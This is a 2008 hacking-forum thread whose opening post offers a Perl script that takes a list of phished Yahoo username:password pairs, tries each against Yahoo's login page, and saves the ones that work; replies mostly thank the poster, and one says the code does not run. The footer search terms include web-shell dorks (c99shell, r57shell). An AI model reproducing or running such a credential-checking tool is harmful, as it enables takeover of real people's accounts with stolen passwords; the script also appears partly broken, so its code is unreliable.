BadHackerZ BHZ Image
Go Back   BadHackerZ > Hacking Arena > Exploit Codes

Notices

IMG Me Up
Register Now for FREE!
Our records show you have not yet registered to our forums. To sign up for your FREE account INSTANTLY fill out the form below!

Username: Password: Confirm Password: E-Mail: Confirm E-Mail:
Birthday:      
Random Question
  I agree to forum rules 

Reply
 
LinkBack Thread Tools Display Modes
Old 10-11-2008   #1 (permalink)
Junior Member
 
Join Date: Oct 2008

Posts: 3
Thanks: 0
Thanked 5 Times in 2 Posts
Rep Power: 0 ♥♥♥ has a spectacular aura about♥♥♥ has a spectacular aura about
Wink Yahoo Account Bruter (perl)

#!/usr/bin/perl

#Yahoo! LOGIN SPECS

#USERNAME: 4-32 characters, Start with a letter. [Letters, Digits, Underscores and ONE dot]

#PASSWORD: 6-32 characters, no spaces



use HTTP::Cookies;

$myCookies = HTTP::Cookies->new();

use LWP::UserAgent;

my $ua = LWP::UserAgent->new;

$ua->cookie_jar($myCookies);

$ua->agent('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.4');

push @{$ua->requests_redirectable}, 'POST';





sub usage{

print "[-] yahoo.pl <logins> (loginass format) <results>\n";

print "[-] yahoo.pl iPhished.txt thanks.txt\n";

die("[!] Incorrect usage\n");

}



sub yahoo($$){

my $username = $_[0];

my $password = $_[1];

my $url = "https://login.yahoo.com/config/login?login=$username&passwd=$password";

my $login = $ua->get($url);

die("[!] Connection error\n") unless ($login->is_success);

if($login->content =~ m/<strong>Invalid ID or password.<\/strong><br> Please try again.<\/div>/){

return 0;

}

elsif($login->content =~ m/<body>\nIf you are seeing this page, your browser settings prevent you \nfrom automatically redirecting to a new URL./){

return 1;

}

elsif($login->content =~ m/Unable to/){

die("[!] Yahoo killed you!\n");

}

}



if(@ARGV!= 2){

&usage;

}

else{

my $loginlist = $ARGV[0];

my $resultlist = $ARGV[1];

open("xfile", $loginlist) || die "Couldn't open $loginlist\n";

while(my $line = <xfile>){

chomp($line);

if($line =~ m/[a-z0-9_\.]\@yahoo\.com(.*?).+){6,32}$/i){

my @details = split(/:/,$line);

print "[-] Checking $details[0] : $details[1]\t";

if(yahoo($details[0],$details[1])){

print "Success\n";

open(LOG,">>$resultlist") || die "Couldn't open $resultlist\n";

print LOG "$details[0]:$details[1]\n";

close(LOG);

}

else{

print "Failure\n";

}

}

}

}
__________________
source :
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
♥♥♥ is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
The Following 2 Users Say Thank You to ♥♥♥ For This Useful Post:
MaDHA¢KeR™ (10-12-2008), shanavas_ks (10-13-2008)

Old 10-23-2008   #2 (permalink)
Leecher
 
Join Date: Jul 2008

Posts: 7
Thanks: 0
Thanked 0 Times in 0 Posts
Rep Power: 0 Cre4tiVe will become famous soon enough
Default

This looooooooooooooooooooooonggggggggggggg bruting! Thanks anyway
Cre4tiVe is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 10-25-2008   #3 (permalink)
Leecher
 
Join Date: Oct 2008

Posts: 5
Thanks: 0
Thanked 0 Times in 0 Posts
Rep Power: 0 xneoz will become famous soon enough
Default

Thanks Cool
xneoz is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 11-04-2008   #4 (permalink)
Leecher
 
Join Date: Oct 2008

Posts: 10
Thanks: 3
Thanked 0 Times in 0 Posts
Rep Power: 9 devil_eye will become famous soon enough
Default

tankx coooooooooooool
devil_eye is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 11-06-2008   #5 (permalink)
Junior Member
 
Join Date: Sep 2008

Posts: 24
Thanks: 0
Thanked 0 Times in 0 Posts
Rep Power: 14 fosi will become famous soon enough
Default

is this method still working?
fosi is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 11-15-2008   #6 (permalink)
Leecher
 
Join Date: Oct 2008

Posts: 14
Thanks: 0
Thanked 0 Times in 0 Posts
Rep Power: 9 mantela27 will become famous soon enough
Default

Thanks great post
mantela27 is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 12-03-2008   #7 (permalink)
Leecher
 
Join Date: Dec 2008

Posts: 8
Thanks: 5
Thanked 0 Times in 0 Posts
Rep Power: 0 llacassoft will become famous soon enough
Send a message via Yahoo to llacassoft
Default

thank you very much what look ...
llacassoft is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 12-03-2008   #8 (permalink)
Junior Member
 
Xploit Machine's Avatar
 
Join Date: Nov 2008

Location: Malaysia
Posts: 39
Thanks: 4
Thanked 0 Times in 0 Posts
Rep Power: 6 Xploit Machine will become famous soon enough
Send a message via AIM to Xploit Machine Send a message via MSN to Xploit Machine Send a message via Yahoo to Xploit Machine Send a message via Skype™ to Xploit Machine
Default

it does not execute anway ! .. please correct the perl codes
Xploit Machine is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 4 Weeks Ago   #9 (permalink)
Leecher
 
Join Date: Dec 2008

Age: 19
Posts: 6
Thanks: 2
Thanked 0 Times in 0 Posts
Rep Power: 0 darksoldier will become famous soon enough
Default

thanksss a lot
darksoldier is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 4 Weeks Ago   #10 (permalink)
Leecher
 
Join Date: Dec 2008

Age: 19
Posts: 6
Thanks: 2
Thanked 0 Times in 0 Posts
Rep Power: 0 darksoldier will become famous soon enough
Default

thanksss a lot
darksoldier is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Reply

Bookmarks



Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On

Similar Threads
Thread Thread Starter Forum Replies Last Post
Yahoo! Account Password Crackers Armageddon Graveyard 14 02-12-2007 05:39 PM

These are the 100 most searched terms
Search Cloud
(intitle:r57shell | intitle:c99shell) +uname acoustic solutions asvm-6271 aishwarya fakes ambit 256 hack bad hackerz badgewinners.com badhackerz badhackerz.com c99shell c99shell powered by admin c99shell v. 1.0 pre-release build #16 choda chudi cmbus-pkg3-nat-any.cm cousin ki chudai dhcp sniffer eset nod32 rapidshare evan poczik evllp.dll free tamil sex stories hotmail phisher idm 512 infinite firmware interesting computer facts intext:rapidshare.com/files linkgrabber 3.1 intitle:c99shell v. 1.0 pre-release +uname ipb 2.3.1 exploit j downloader logmein pro rapidshare logmein rapidshare mass effect megaupload mass effect rapidshare naughtyamerica.com nod32 rapidshare nod32 rapidshare.com pinnacle studio 12 rapidshare powered by captain crunch security team ptgui rapidshare rapidshare rosetta stone rosetta stone application rosetta stone rapidshare rosetta stone romanian rosetta stone update safe-mode: off (not secure) drwxrwxrwx c99shell sigma 1.7 softjtag tamil sex stories tera patrick rapidshare vbulletin 3.7.0 exploit vbulletin exploit www.badhackerz.com ... powered by Simple Search Cloud

All times are GMT +5.5. The time now is 11:46 AM.


Website Design by How.ToDesignYour.Com
Powered by vBulletin® Version 3.7.3
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 3.1.0 ©2007, Crawlability, Inc.
vBCredits v1.4 Copyright ©2007 - 2008, PixelFX Studios